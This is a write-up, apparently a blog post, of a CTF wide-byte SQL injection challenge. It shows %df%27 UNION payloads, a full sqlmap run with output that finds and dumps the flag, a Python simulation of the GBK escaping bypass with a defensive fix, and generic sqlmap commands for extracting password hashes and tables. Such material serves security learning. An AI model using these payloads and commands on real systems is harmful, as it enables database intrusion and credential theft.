sqlmap Series (Part 1)

2018/08/17 Security sqlmap 7073 words

Discussing a tool's usage without a concrete scenario is just idle talk, so here I plan to record how sqlmap is used in various scenarios.

0x01 Scenario

A wide-byte injection challenge on NCTF.
Since the challenge hints at it so clearly, try wide-byte injection (%df) directly:

step1:

index.php?id=%df%27 union select 1,2%23

step2:

index.php?id=%df%27 union select 1,table_name from information_schema.tables where table_schema=database() limit 1,1%23

What follows is routine and needs no comment: find the columns, then query the target data. The problem here lies in querying the target data: the goal of this injection is not the administrator's username and password but the flag, and to get the flag you first have to find the flag column. Short of trying (brute-forcing) column names, there is no good way to locate it.

So without further ado: either write a script or use sqlmap. Here I chose sqlmap.
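As an added illustration (not code from the post, the challenge, or sqlmap), the following Python simulates the mechanism the %df%27 trick relies on: an addslashes-style byte-wise escape turns the bytes DF 27 into DF 5C 27, and a GBK connection charset then reads DF 5C as one two-byte character, leaving the quote bare, whereas a UTF-8 charset keeps the backslash in front of the quote. The query template, the `safe_literal` strict-decode-then-escape check, and the sample parameter values are assumptions constructed for the example.

```python
# Added example (not from the original post): simulate why '%df%27' survives
# byte-wise escaping when MySQL reads the literal as GBK, plus one defensive fix.
from urllib.parse import unquote_to_bytes

ESCAPED = b"'\"\\\x00"  # bytes that byte-wise escaping prefixes with a backslash


def addslashes(raw: bytes) -> bytes:
    """Byte-oriented escaping like PHP addslashes(): backslash before ' " \\ NUL."""
    out = bytearray()
    for b in raw:
        if b in ESCAPED:
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def build_literal(param: str, charset: str) -> str:
    """Percent-decode the id value, escape it byte-wise, then read the bytes the
    way a DBMS using this connection charset would (undecodable bytes replaced)."""
    return addslashes(unquote_to_bytes(param)).decode(charset, errors="replace")


def has_unescaped_quote(literal: str) -> bool:
    """True if a single quote not protected by a backslash would end the literal."""
    escaped = False
    for ch in literal:
        if escaped:
            escaped = False
        elif ch == "\\":
            escaped = True
        elif ch == "'":
            return True
    return False


def safe_literal(param: str, charset: str = "gbk") -> str:
    """Defensive variant (constructed): decode strictly first, so an invalid
    sequence such as 0xDF 0x27 is rejected, then escape whole characters so a
    backslash is never glued onto a dangling lead byte. Parameterised queries
    remain the preferred fix."""
    try:
        text = unquote_to_bytes(param).decode(charset)
    except UnicodeDecodeError as exc:
        raise ValueError("parameter is not valid %s: %s" % (charset, exc)) from None
    return "".join("\\" + c if c in "'\"\\\x00" else c for c in text)


if __name__ == "__main__":
    payload = "1%df%27 union select 1,2%23"  # constructed, mirrors the post's step 1
    print(repr(build_literal(payload, "gbk")), repr(build_literal(payload, "utf-8")))
```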

0x02 Process

python sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27" --search -C flag --level 3 --risk 1 --thread 10

--search -C flag  // followed by -D, -T or -C: search for column(s), table(s) and/or database name(s)
--level 3         // by default sqlmap tests all GET and POST parameters; at --level >= 2 it also tests the HTTP Cookie header values, and at >= 3 the User-Agent and HTTP Referer headers as well. Maximum is 5
--risk 1          // risk of the tests to perform (0-3, default 1); the higher the risk, the slower but the safer the test
--threads 10      // if you have used msfconsole this will look familiar; sqlmap allows at most 10 threads
$~/Desktop/weapons/sqlmap python sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27" --search -C flag --level 3 --risk 1 --thread 10
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.2#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:17:56

[11:17:56] [WARNING] it appears that you have provided tainted parameter values ('id=1%df'') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
·
·
·
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (1) values? [Y/n] n
·
·
·
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[11:19:04] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') 
[11:19:04] [INFO] testing 'Generic UNION query (48) - 21 to 40 columns'
[11:19:09] [INFO] testing 'Generic UNION query (48) - 41 to 60 columns'
[11:19:14] [INFO] testing 'MySQL UNION query (48) - 1 to 20 columns'
[11:19:17] [INFO] testing 'MySQL UNION query (48) - 21 to 40 columns'
[11:19:21] [INFO] testing 'MySQL UNION query (48) - 41 to 60 columns'
[11:19:26] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 187 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1%df' AND 8950=8950-- dURB

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1%df' AND SLEEP(5)-- Gkws
---
[11:19:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default)
[2] as exact column names
> 1
[11:20:11] [INFO] searching columns LIKE 'flag' across all databases
[11:20:11] [INFO] fetching number of databases with tables containing columns LIKE 'flag' across all databases
[11:20:11] [INFO] retrieved: 1
[11:20:12] [INFO] retrieving the length of query output
[11:20:12] [INFO] retrieved: 14
[11:20:19] [INFO] retrieved: sae-chinalover             
[11:20:19] [INFO] fetching number of tables containing columns LIKE 'flag' in database 'sae-chinalover'
[11:20:19] [INFO] retrieved: 1
[11:20:20] [INFO] retrieving the length of query output
[11:20:20] [INFO] retrieved: 4
[11:20:23] [INFO] retrieved: ctf4           
[11:20:23] [INFO] fetching columns LIKE 'flag' for table 'ctf4' in database 'sae-chinalover'
[11:20:23] [INFO] retrieved: 1
[11:20:25] [INFO] retrieving the length of query output
[11:20:25] [INFO] retrieved: 4
[11:20:28] [INFO] retrieved: flag           
columns LIKE 'flag' were found in the following databases:
Database: sae-chinalover
Table: ctf4
[1 column]
+--------+
| Column |
+--------+
| flag   |
+--------+

do you want to dump entries? [Y/n] y
which database(s)?
[a]ll (default)
[sae-chinalover]
[q]uit
> 
which table(s) of database 'sae-chinalover'?
[a]ll (default)
[ctf4]
[s]kip
[q]uit
> 
[11:21:10] [INFO] fetching entries of column(s) 'flag' for table 'ctf4' in database 'sae-chinalover'
[11:21:10] [INFO] fetching number of column(s) 'flag' entries for table 'ctf4' in database 'sae-chinalover'
[11:21:10] [INFO] retrieved: 1
[11:21:12] [INFO] retrieving the length of query output
[11:21:12] [INFO] retrieved: 15
[11:21:18] [INFO] retrieved: nctf{gbk_3sqli}             
Database: sae-chinalover
Table: ctf4
[1 entry]
+-----------------+
| flag            |
+-----------------+
| nctf{gbk_3sqli} |
+-----------------+

[11:21:18] [INFO] table '`sae-chinalover`.ctf4' dumped to CSV file '/Users/yangpeng/.sqlmap/output/chinalover.sinaapp.com/dump/sae-chinalover/ctf4.csv'
[11:21:18] [INFO] fetched data logged to text files under '/Users/yangpeng/.sqlmap/output/chinalover.sinaapp.com'

[*] shutting down at 11:21:18

0x03 Common usages

Source: http://www.youtube.com/user/inquisb/videos

1.Extensively fingerprint the back-end database management system, enumerate banner, session user, current database, users, users’ password hashes and databases
version: 0.8
target DB: MySQL 5.1
target web application: Apache 2.2 / PHP 5.2
target OS: Debian GNU/Linux 5.0

python sqlmap -u "http://xxx/test.php?id=1" -f -b --current-user --current-db --users --passwords --dbs -v 0

-u              // target URL
-f              // perform an extensive DBMS version fingerprint
-b              // retrieve the DBMS banner
--current-user  // current database user
--current-db    // the site's current database
--users         // all database users
--passwords     // enumerate the database users' password hashes
--dbs           // all databases
-v              // verbosity level

2.Retrieve the database management system banner and enumerate the password hash(es) for database session user via UNION query SQL injection
version: 0.8
target DB: Oracle 10.2 Enterprise Edition
target web application: Apache 2.2 / PHP 5.2
target OS: Debian GNU/Linux 5.0

python sqlmap -u "http://xxx/test.php?id=1" -b --passwords -U CU --union-use -v 2

-u              // target URL
-b              // retrieve the DBMS banner
--passwords     // enumerate the database users' password hashes
-U              // specify a database user (CU is an alias for the current user)
--union-use     // retrieve data via UNION query SQL injection where possible
-v              // verbosity level (2, debug)

3.Dump only from the second to the third entry of column surname of table users
version: 0.8
target DB: SQL Server 2005
target web application: IIS6.0 / ASP
target OS: Win2003 Service Pack 2

python sqlmap -u "http://xxx/test.asp?name=luther" --dump -T users -C username -D testdb --start 2 --stop 3 -v 2

-u       // target URL
--dump   // dump the table's entries
-T       // target table
-C       // target column
--start  // first entry to retrieve
--stop   // last entry to retrieve
-v       // verbosity level (2, debug)

0x04 References

sqlmap documentation
http://www.vuln.cn/1992
The WooYun knowledge base also has a few good articles
